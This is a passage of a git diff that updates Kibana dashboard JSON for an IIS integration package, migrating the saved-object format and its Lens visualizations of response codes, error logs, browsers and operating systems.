"c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "90575b21-d32b-46c4-a798-a2919f4f9129:indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "00e3504a-5841-41ee-bdf6-e9e2633da51c:indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "73429e76-7391-4cb0-94d4-6a7f0eae0803:indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", - "type": "index-pattern" + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "type": "index-pattern" - } + "title": "Memory Usage" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Webserver Process Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "1f700551-5464-467f-99ec-3b329e355195:indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d2f639d2-4288-4110-871d-c123e43a8a5f:indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6:indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9acc09af-8176-4625-927d-af97d4b5080b:indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de5da809-a2ac-4388-9040-ed6f037c901d:indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a64ca567-3295-4753-9a22-2ce5dcb16a40:indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "90575b21-d32b-46c4-a798-a2919f4f9129:indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "00e3504a-5841-41ee-bdf6-e9e2633da51c:indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "73429e76-7391-4cb0-94d4-6a7f0eae0803:indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json b/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json index be7f8d952e8..6b40143e7f0 100644 --- a/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json +++ b/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json @@ -1,840 +1,863 @@ { - "attributes": { - "description": "Dashboard for the Logs IIS integration", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } + "id": "iis-4278ad30-fe16-11e7-a3b0-d13028918f9f", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNSwxXQ==", + "attributes": { + "description": "Dashboard for the Logs IIS integration", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": true + "version": true + } + }, + "optionsJSON": { + "darkTheme": false, + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hiddenLayers": [], + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 66.51326, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -180 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 1.58 + }, + "openTOCDetails": [], + "attributes": { + "title": "Access map", + "description": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}", + "mapStateJSON": "{\"center\":{\"lat\":19.94277,\"lon\":0},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":true},\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"browserLocation\":{\"zoom\":2},\"disableInteractive\":false,\"disableTooltipControl\":false,\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"hideLayerControl\":false,\"hideToolbarOverlay\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":1.58}", + "layerListJSON": "[{\"alpha\":1,\"id\":\"5875b362-0633-4f76-a8d3-6e24337bacc0\",\"includeInFitToBounds\":true,\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\",\"type\":\"EMS_TMS\"},\"style\":{\"type\":\"TILE\"},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"cc7a42a7-7e5c-4ee5-90f3-972c488b05ee\",\"includeInFitToBounds\":true,\"joins\":[],\"label\":\"Access map [Logs IIS]\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyForceRefresh\":true,\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"geoField\":\"source.geo.location\",\"id\":\"bb680314-5606-4509-ac4f-f1089c1180db\",\"indexPatternRefName\":\"layer_1_source_index_pattern\",\"metrics\":[{\"type\":\"count\"}],\"requestType\":\"point\",\"resolution\":\"MOST_FINE\",\"type\":\"ES_GEO_GRID\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"type\":\"ORDINAL\"},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"marker\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":18,\"minSize\":7},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"value\":\"\"},\"type\":\"STATIC\"},\"lineColor\":{\"options\":{\"color\":\"#3d3d3d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]" + } }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hiddenLayers": [], - "isLayerTOCOpen": false, - "mapBuffer": { - "maxLat": 66.51326, - "maxLon": 180, - "minLat": -66.51326, - "minLon": -180 - }, - "mapCenter": { - "lat": 19.94277, - "lon": 0, - "zoom": 1.58 - }, - "openTOCDetails": [] - }, - "gridData": { - "h": 15, - "i": "ec72819b-6985-4761-94ae-5d5fcc9e682a", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "ec72819b-6985-4761-94ae-5d5fcc9e682a", - "panelRefName": "panel_ec72819b-6985-4761-94ae-5d5fcc9e682a", - "type": "map", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "238d8224-43e0-4df5-9862-decc0b59c88e": { - "columnOrder": [ - "71e2f8c4-a180-4bca-aa3c-1517b6265357", - "43487d89-4842-45a4-93a2-b616ef23ed62", - "533bfa0f-236b-43db-a528-a399a265237f" - ], - "columns": { - "43487d89-4842-45a4-93a2-b616ef23ed62": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "533bfa0f-236b-43db-a528-a399a265237f", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "533bfa0f-236b-43db-a528-a399a265237f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "71e2f8c4-a180-4bca-aa3c-1517b6265357": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "gridData": { + "h": 15, + "i": "ec72819b-6985-4761-94ae-5d5fcc9e682a", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "ec72819b-6985-4761-94ae-5d5fcc9e682a", + "type": "map", + "version": "8.4.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", + "w": 28, + "x": 0, + "y": 15 + }, + "panelIndex": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "238d8224-43e0-4df5-9862-decc0b59c88e": { + "columnOrder": [ + "71e2f8c4-a180-4bca-aa3c-1517b6265357", + "43487d89-4842-45a4-93a2-b616ef23ed62", + "533bfa0f-236b-43db-a528-a399a265237f" + ], + "columns": { + "43487d89-4842-45a4-93a2-b616ef23ed62": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "533bfa0f-236b-43db-a528-a399a265237f", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "533bfa0f-236b-43db-a528-a399a265237f" - ], - "layerId": "238d8224-43e0-4df5-9862-decc0b59c88e", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "43487d89-4842-45a4-93a2-b616ef23ed62", - "xAccessor": "71e2f8c4-a180-4bca-aa3c-1517b6265357", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "533bfa0f-236b-43db-a528-a399a265237f" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "yTitle": "Count" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "533bfa0f-236b-43db-a528-a399a265237f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "71e2f8c4-a180-4bca-aa3c-1517b6265357": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 12, - "i": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", - "w": 28, - "x": 0, - "y": 15 + "layers": [ + { + "accessors": [ + "533bfa0f-236b-43db-a528-a399a265237f" + ], + "layerId": "238d8224-43e0-4df5-9862-decc0b59c88e", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "43487d89-4842-45a4-93a2-b616ef23ed62", + "xAccessor": "71e2f8c4-a180-4bca-aa3c-1517b6265357", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "533bfa0f-236b-43db-a528-a399a265237f" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", - "title": "Response codes over time", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700": { - "columnOrder": [ - "d8f9ffaf-6b57-4eda-8609-51b4527aad60", - "26bc4021-a53a-4624-a8ca-291f5b728a61", - "85e05d12-166f-418c-94c8-2717876b57fb" - ], - "columns": { - "26bc4021-a53a-4624-a8ca-291f5b728a61": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "85e05d12-166f-418c-94c8-2717876b57fb", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "85e05d12-166f-418c-94c8-2717876b57fb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "d8f9ffaf-6b57-4eda-8609-51b4527aad60": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Response codes over time" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1823acfd-eadf-42be-b208-773047e26dec", + "w": 20, + "x": 28, + "y": 15 + }, + "panelIndex": "1823acfd-eadf-42be-b208-773047e26dec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700": { + "columnOrder": [ + "d8f9ffaf-6b57-4eda-8609-51b4527aad60", + "26bc4021-a53a-4624-a8ca-291f5b728a61", + "85e05d12-166f-418c-94c8-2717876b57fb" + ], + "columns": { + "26bc4021-a53a-4624-a8ca-291f5b728a61": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "85e05d12-166f-418c-94c8-2717876b57fb", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "85e05d12-166f-418c-94c8-2717876b57fb" - ], - "layerId": "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "26bc4021-a53a-4624-a8ca-291f5b728a61", - "xAccessor": "d8f9ffaf-6b57-4eda-8609-51b4527aad60", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "85e05d12-166f-418c-94c8-2717876b57fb" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "yTitle": "Count" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "85e05d12-166f-418c-94c8-2717876b57fb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d8f9ffaf-6b57-4eda-8609-51b4527aad60": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "1823acfd-eadf-42be-b208-773047e26dec", - "w": 20, - "x": 28, - "y": 15 + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "1823acfd-eadf-42be-b208-773047e26dec", - "title": "Error logs over time", - "type": "lens", - "version": "8.5.0" + "layers": [ + { + "accessors": [ + "85e05d12-166f-418c-94c8-2717876b57fb" + ], + "layerId": "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "26bc4021-a53a-4624-a8ca-291f5b728a61", + "xAccessor": "d8f9ffaf-6b57-4eda-8609-51b4527aad60", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "85e05d12-166f-418c-94c8-2717876b57fb" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "fd149e1e-318c-4e85-b6d6-aea79fa8f331": { - "columnOrder": [ - "55d696f1-af3d-4337-9079-5f508bb7067b", - "bb351508-abfd-4fba-93dc-a368503122c5", - "482cc37a-80e9-4259-92dc-da53d07c23f2" - ], - "columns": { - "482cc37a-80e9-4259-92dc-da53d07c23f2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "55d696f1-af3d-4337-9079-5f508bb7067b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.name" - }, - "bb351508-abfd-4fba-93dc-a368503122c5": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.version" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Error logs over time" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "ff2a5b50-3711-4db3-b189-0581ddba15f6", + "w": 24, + "x": 0, + "y": 42 + }, + "panelIndex": "ff2a5b50-3711-4db3-b189-0581ddba15f6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fd149e1e-318c-4e85-b6d6-aea79fa8f331": { + "columnOrder": [ + "55d696f1-af3d-4337-9079-5f508bb7067b", + "bb351508-abfd-4fba-93dc-a368503122c5", + "482cc37a-80e9-4259-92dc-da53d07c23f2" + ], + "columns": { + "482cc37a-80e9-4259-92dc-da53d07c23f2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "55d696f1-af3d-4337-9079-5f508bb7067b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "hide", - "layerId": "fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "layerType": "data", - "legendDisplay": "show", - "metric": "482cc37a-80e9-4259-92dc-da53d07c23f2", - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "55d696f1-af3d-4337-9079-5f508bb7067b", - "bb351508-abfd-4fba-93dc-a368503122c5" - ] - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ff2a5b50-3711-4db3-b189-0581ddba15f6", - "w": 24, - "x": 0, - "y": 42 + "bb351508-abfd-4fba-93dc-a368503122c5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "hide", + "layerId": "fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "55d696f1-af3d-4337-9079-5f508bb7067b", + "bb351508-abfd-4fba-93dc-a368503122c5" + ], + "metrics": [ + "482cc37a-80e9-4259-92dc-da53d07c23f2" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "ff2a5b50-3711-4db3-b189-0581ddba15f6", - "title": "Browsers breakdown", - "type": "lens", - "version": "8.5.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "83c02141-7b27-4ae9-8c80-d251c18f5685": { - "columnOrder": [ - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", - "ff18c09c-1df1-41e9-9f42-d846a26dac01", - "42cb9808-f556-4da5-a3d5-07e3d28a48dc" - ], - "columns": { - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.name" - }, - "42cb9808-f556-4da5-a3d5-07e3d28a48dc": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - 